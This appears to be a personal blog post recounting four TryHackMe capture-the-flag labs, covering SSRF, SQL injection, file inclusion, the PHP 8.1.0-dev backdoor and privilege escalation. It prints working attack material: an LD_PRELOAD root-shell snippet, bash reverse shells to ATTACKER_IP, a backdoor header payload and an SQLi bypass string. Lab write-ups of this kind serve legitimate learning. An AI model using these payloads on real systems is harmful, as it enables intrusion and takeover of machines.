Capture The Flag: Breaking Into TryHackMe

Two years ago, I started working through Capture The Flag competitions on TryHackMe. Through consistent practice, I developed proficiency in identifying vulnerabilities, exploiting misconfigurations, and executing privilege escalation from www-data to root.

This post documents a few select challenges that stood out — these are just examples of the many CTFs I've completed. I've chosen to highlight the ones that taught me something new or forced me to think differently about attack vectors.

The Fundamentals

Every CTF follows a similar pattern:

1. Enumeration — nmap for port scanning, gobuster/dirsearch for directory bruteforcing
2. Analysis — inspecting source code, checking for exposed credentials, testing for common vulnerabilities
3. Exploitation — gaining initial access through web exploits, weak credentials, or misconfigurations
4. Privilege Escalation — moving from low-privilege user to root using SUID binaries, sudo misconfigurations, or writable files

The methodology stays consistent, but each machine presents unique twists that require adaptation and creativity.

Creative CTF: SSRF and LD_PRELOAD Escalation

The Challenge: A subdomain beta.creative.thm hosted a URL "liveness tester" — a classic Server-Side Request Forgery (SSRF) vulnerability waiting to be exploited.

The Exploit: By testing http://localhost in the URL field, I confirmed SSRF. Using Burp Suite's Intruder, I fuzzed internal ports and discovered port 1337 — an internal file listing service. This allowed me to read /etc/passwd, identify user saad, and extract his SSH private key from /home/saad/.ssh/id_rsa.

Privilege Escalation: The key was password-protected, but ssh2john and John the Ripper cracked it quickly. Once inside as saad, I found he could run /usr/bin/ping as root. While GTFOBins didn't have a direct exploit, I discovered the LD_PRELOAD privilege escalation technique:

// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Compiling this, setting LD_PRELOAD, and executing ping gave me a root shell. Flag captured.

Cheese CTF: SQL Injection to RCE

The Challenge: A login panel vulnerable to SQL injection, followed by a Remote Code Execution opportunity through PHP file inclusion.

The Exploit: Standard SQLi payloads failed, but the alternative syntax ' || 1=1; -- - bypassed authentication. Inside the admin panel, I found a secret_script.php with a file parameter — a textbook Local File Inclusion (LFI) vulnerability.

Testing with /etc/passwd confirmed LFI worked. I then used a PHP filter chain generator from GitHub to achieve RCE:

python3 php_filter_chain_generator.py \
  --chain 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

This generated a malicious filter chain that executed my reverse shell payload when loaded through the vulnerable file parameter.

Privilege Escalation: After spawning a proper TTY with Python, I ran LinPEAS and discovered /home/comte/.ssh/authorized_keys was world-writable. I added my public SSH key, logged in as comte, and found a vulnerable systemd timer that granted SUID permissions to xxd.

Using GTFOBins' xxd privilege escalation technique, I wrote my public key to /root/.ssh/authorized_keys and logged in as root.

Agent T CTF: PHP 8.1.0-dev Backdoor

The Challenge: A seemingly standard web application running PHP 8.1.0-dev.

The Exploit: A quick check of the PHP version revealed a critical vulnerability — PHP 8.1.0-dev contained a backdoored User-Agent header that allowed arbitrary command execution. The exploit was trivial:

headers = {
    "User-Agent": "Mozilla/5.0 ...",
    "User-Agentt": "zerodiumsystem('" + cmd + "');"  # Note the typo in User-Agentt
}

The backdoor checked for a specially crafted User-Agentt header (with double 't') and executed any command passed to zerodiumsystem(). Instant RCE.

The flag had no read restrictions. Challenge completed in under 5 minutes.

LazyAdmin CTF: SweetRice CMS Exploitation

The Challenge: A SweetRice 1.5.1 CMS installation with an exposed database backup.

The Exploit: Directory enumeration revealed /content/as/ — the admin panel — and a database backup at /content/inc/mysql_backup/. The backup contained an MD5 hash for the manager account. John the Ripper cracked it immediately: Password123.

After logging in, I found a file upload vulnerability in the Ads section. I uploaded a PHP reverse shell disguised as an ad image, navigated to the uploaded file, and caught a reverse shell as www-data.

Privilege Escalation: The user had a backup script copy.sh that ran with root privileges via sudo. The script was world-writable. I added a reverse shell to the script:

echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> copy.sh
sudo /path/to/copy.sh

Root shell achieved.

Key Takeaways

After completing 55 TryHackMe challenges, several patterns emerged:

1. Default Credentials Kill — Many challenges fell to admin:admin or weak passwords like Password123
2. Directory Enumeration is Essential — Tools like gobuster and dirsearch revealed hidden panels, backups, and sensitive files
3. Privilege Escalation is an Art — Understanding SUID binaries, sudo misconfigurations, writable systemd files, and LD_PRELOAD is crucial
4. GTFOBins is Your Bible — If a binary can be run as sudo, check GTFOBins first
5. Python for TTY — python3 -c 'import pty; pty.spawn("/bin/bash")' became muscle memory
6. LinPEAS Automates the Hunt — Running enumeration scripts saves hours of manual checking

Tools That Became Second Nature

• nmap — Port scanning and service enumeration
• gobuster/dirsearch — Directory and file bruteforcing
• Burp Suite — Intercepting and manipulating HTTP requests
• John the Ripper — Password cracking for SSH keys and hashes
• LinPEAS — Automated Linux privilege escalation enumeration
• GTFOBins — Database of Unix binary exploitation techniques
• ssh2john — Converting SSH keys to John-compatible hashes

Reflections

These CTFs were more than just exercises — they shaped how I think about security. Every misconfigured service, every writable file, every exposed credential is a potential entry point. The defensive mindset that came from offensive practice is now integral to how I architect systems.

TryHackMe provided a safe, legal environment to develop skills that directly translate to real-world penetration testing and security engineering. The documentation process itself — writing walkthroughs, capturing screenshots, analyzing exploits — reinforced learning in ways that passive reading never could.

Two years later, these challenges remain some of the most formative experiences in my cybersecurity journey. The methodology stays with me: enumerate exhaustively, think like an attacker, and never assume a system is secure until you've tried to break it yourself.

---

Disclaimer: All activities described were conducted in controlled TryHackMe environments with explicit permission. Unauthorized access to computer systems is illegal.